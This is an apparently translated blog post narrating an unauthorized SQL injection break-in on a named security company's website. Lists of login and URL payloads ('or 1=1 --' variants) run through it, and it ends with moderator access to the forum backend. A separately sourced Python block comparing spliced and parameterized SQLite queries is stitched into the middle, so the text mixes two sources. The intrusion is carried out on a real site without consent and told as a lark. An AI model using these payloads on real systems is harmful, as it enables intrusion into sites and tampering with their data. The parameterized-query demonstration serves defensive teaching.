The whole process of SQL Injection penetrating a website of a network security company

Source: Internet
Author: User
Tags: how to use sql

This article is not meant to teach anyone how to break in, but to remind everyone that "intrusion is accidental, but security is not guaranteed": do not neglect the small operational details.
I have always had the habit of visiting security websites regularly. Recently, by coincidence, a link took me to the website of a well-known network security company in Guangzhou. To be honest, the site is quite diverse: besides providing software downloads, it also has its own forum (hey, the interface really looks good; I wonder how secure it is?). Out of curiosity about its security, Xiao Shen decided to give it a preliminary "security penetration test". At the start I only used some general network vulnerability scanners (X-Scan 3.0, Nmap, Retina, etc.) to gather information and then sifted the results: only TCP port 80 was open (that is, their server only provides ordinary HTTP service), and no typical vulnerability was found... no surprise, the other side is a well-known enterprise after all (since the focus of this article is not there, I will not describe the scanner step in detail). Give up just like that? It's not that easy... as it happens, Xiao Shen has recently been sorting out SQL injection (SQL injection attack) material, so now that there is an opportunity, I can "conveniently" use it for a test :P
------------------------------------------------------------------------------------------
Tip:
Q: What is SQL injection?
A: The trick of this attack is to embed SQL query or command fragments into an otherwise legitimate HTTP request so that the database executes them and the attacker's intention is carried out. Currently, many dynamic web pages take some parameters from the user's request and then dynamically build an SQL query to send to the database. For example, when a user logs in (user identity verification) through a web page, the dynamic page splices the submitted user name and password into an SQL query and sends it to the database to confirm whether the submitted credentials are valid. From the point of view of SQL injection, this lets us attack by modifying the values of the user name and/or password fields that end up in the SQL query.

For more information about SQL injection technology, see:
http://demonalex.nease.net/SQL_injection/walkthrough.txt
------------------------------------------------------------------------------------------
First, go to the site's download system and pick a tool:
http://<the security company's website>/<a directory>/download/open.asp?id=3444
------------------------------------------------------------------------------------------
Note: I have replaced some sensitive information with Chinese placeholders. Sorry.
------------------------------------------------------------------------------------------
http://<the security company's website>/<a directory>/download/open.asp?id=3444'
First, test whether the other side filters ' (single quotes)...

Description:
Q: How can I check whether a website has an SQL injection flaw?
A: First, add some special characters to the input, for example:
hi' or 1=1 --
Look for a login page and enter it in the login ID and password fields, or in the URL:
- Login: hi' or 1=1 --
- Pass: hi' or 1=1 --
- http://duck/index.htm?id=hi' or 1=1 --
If you want to run such a test against 'hidden' fields, download the HTML page from the site to the local disk and modify the values of the hidden fields, for example:
<form action="http://duck/search.asp" method="post">
<input type="hidden" name="A" value="hi' or 1=1 --">
</form>
If you are lucky, you may be able to log in without any account or password.
------------------------------------------------------------------------------------------
Try the following URLs to see whether a normal page is still returned...
http://<the security company's website>/<a directory>/download/open.asp?id=3444"
http://<the security company's website>/<a directory>/download/open.asp?id=3444' or 1=1 --
http://<the security company's website>/<a directory>/download/open.asp?id=3444" or 1=1 --
http://<the security company's website>/<a directory>/download/open.asp?id=3444' or 'a'='a
http://<the security company's website>/<a directory>/download/open.asp?id=3444" or "a"="a
------------------------------------------------------------------------------------------
Tip:
Q: Why use ' or 1=1 -- for testing?
A: Let's look at the importance of ' or 1=1 -- in another example. Unlike a normal login, this method can be used to obtain special information that normal login would never return. Take as an example an ASP page reached from a link:
http://duck/index.htm?category=food
In the URL above, 'category' is the variable name and 'food' is the value assigned to it. For this link to work, the ASP page must contain code along these lines (below is also the code we wrote to demonstrate this experiment):
' the category value is taken straight from the request, with no filtering
v_cat = request("category")
' and spliced directly into the SQL text
sqlstr = "select * from product where pcategory='" & v_cat & "'"
set rs = conn.execute(sqlstr)
As we can see, the variable value is stored in 'v_cat' unchanged, so the SQL statement becomes:
select * from product where pcategory='food'
This request returns the rows that match the where condition, in this example the rows whose category is 'food'. Now imagine we change the URL to this:
http://duck/index.htm?category=food' or 1=1 --
Now the value of our variable v_cat is "food' or 1=1 --". Splice it into the SQL request and the request becomes:
select * from product where pcategory='food' or 1=1 --'
This request now selects every row from the product table and no longer checks whether pcategory equals 'food'. The two dashes '--' at the end tell MS SQL Server to ignore the rest of the line, including the trailing single quote. Sometimes '#' can be used instead. If the other side is not SQL Server (MS SQL Server here), or the trailing single quote cannot be ignored in such a simple way, you can try:
' or 'a'='a
In this case the whole SQL request becomes:
select * from product where pcategory='food' or 'a'='a'
It returns the same result.
Depending on the actual situation, the SQL injection input can vary in many ways:
' or 1=1 --
" or 1=1 --
or 1=1 --
' or 'a'='a
" or "a"="a
') or ('a'='a
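To make the point of the tip concrete from the defender's side, here is an added example (not code from the original article) that rebuilds the product/pcategory query in an in-memory SQLite database and runs the string-spliced form beside the parameterized form. The table contents are constructed; the category values are the ones the tip walks through. It also shows why a lone quote produced the "HTTP 500" seen in the probes: the spliced SQL is simply malformed.

```python
import sqlite3


def make_db():
    """Constructed in-memory copy of the 'product' table from the ASP example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table product (pid integer, pname text, pcategory text)")
    conn.executemany(
        "insert into product values (?, ?, ?)",
        [(1, "rice", "food"), (2, "tea", "food"), (3, "router", "hardware")],
    )
    return conn


def query_concat(conn, v_cat):
    """Mirrors sqlstr = "select * from product where pcategory='" & v_cat & "'"."""
    sqlstr = "select * from product where pcategory='" + v_cat + "'"
    return conn.execute(sqlstr).fetchall()


def query_param(conn, v_cat):
    """Hardened form: the category travels as a bound parameter, never as SQL text."""
    return conn.execute("select * from product where pcategory=?", (v_cat,)).fetchall()


def probe(v_cat):
    """Return (rows from the spliced query, rows from the parameterized query).

    None for the first value means the spliced query was not even valid SQL,
    which is what an unhandled single quote produces (the article's "HTTP 500").
    """
    conn = make_db()
    try:
        spliced = len(query_concat(conn, v_cat))
    except sqlite3.Error:
        spliced = None
    bound = len(query_param(conn, v_cat))
    return spliced, bound


if __name__ == "__main__":
    for v in ["food", "food'", "food' or 1=1 --", "food' or 'a'='a"]:
        print(repr(v), "->", probe(v))
```

With the spliced query the two payloads return all three rows, while the bound parameter returns none because the whole string is compared literally against pcategory.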
------------------------------------------------------------------------------------------
They all return "HTTP 500 - Internal Server Error"; it seems to have failed again. There is still hope... at this point we can only pin our hopes on the forum...

Step by step: first find the URL of a post (the one I picked: http://<the security company's website>/<forum directory>/list.asp?ltid=14) and repeat the previous steps:
http://<the security company's website>/<forum directory>/list.asp?ltid=14'
http://<the security company's website>/<forum directory>/list.asp?ltid=14"
http://<the security company's website>/<forum directory>/list.asp?ltid=14' or 1=1 --
http://<the security company's website>/<forum directory>/list.asp?ltid=14" or 1=1 --
http://<the security company's website>/<forum directory>/list.asp?ltid=14' or 'a'='a
http://<the security company's website>/<forum directory>/list.asp?ltid=14" or "a"="a
However, it still came up empty... (as shown in the figure)

Besides the address bar, don't forget the login box on the forum homepage:

In the "User name:" field, enter:
Network***' or 1=1 --
Then enter any few characters in the "Password:" field :P
------------------------------------------------------------------------------------------
Note: "Network***" is the moderator account shown on the forum homepage.
------------------------------------------------------------------------------------------

Still not working. Try the injection in the password field instead... concretely:
In "User name:", enter:
Network***
In "Password:", enter:
' or 1=1 --
(after submitting)

Failed... try the variants again:
' or 1=1 --
" or 1=1 --
or 1=1 --
' or 'a'='a
" or "a"="a
After switching between them several times, it still does not work. It seems to be "indestructible"...
"The wind continues to blow, I cannot bear to stay away..." Xiao Shen's MP3 player was playing the song by 'Elder Brother' Leslie Cheung. Leave just like that? Back to the forum
page for another look around... and at a glance I notice the small links at the top of the forum login area, the third one in particular.
What is this link?

Clicking it brings up the login window shown below:

First select the corresponding board in the "Forum:" box (here I picked the first board, "Security Tools"), then try again:
Account: Network***' or 1=1 --
Password: any password

No luck; try again:
Account: Network***
Password: ' or 1=1 --
......
......
Xiao Shen's hand trembled for a moment, because the "colorful interface" appeared:

At first I thought it was an illusion. I quickly clicked "Enter the backend >>>"...

This time it seems to be real. Click one of the posts and try again:

(See it? There is a "delete" button. In fact we could do far more than this... PS: Xiao Shen is a good kid. ^_^)
That is the whole story. Any thoughts?! ^_^
The main purpose of this article is to show how SQL injection can be used to penetrate a forum.
This is an old topic, yet it is hard to imagine that even a well-known network security company has such a flaw. In the end, security comes down to people's awareness.
What this article tells us is not to overlook the small details in day-to-day operation.
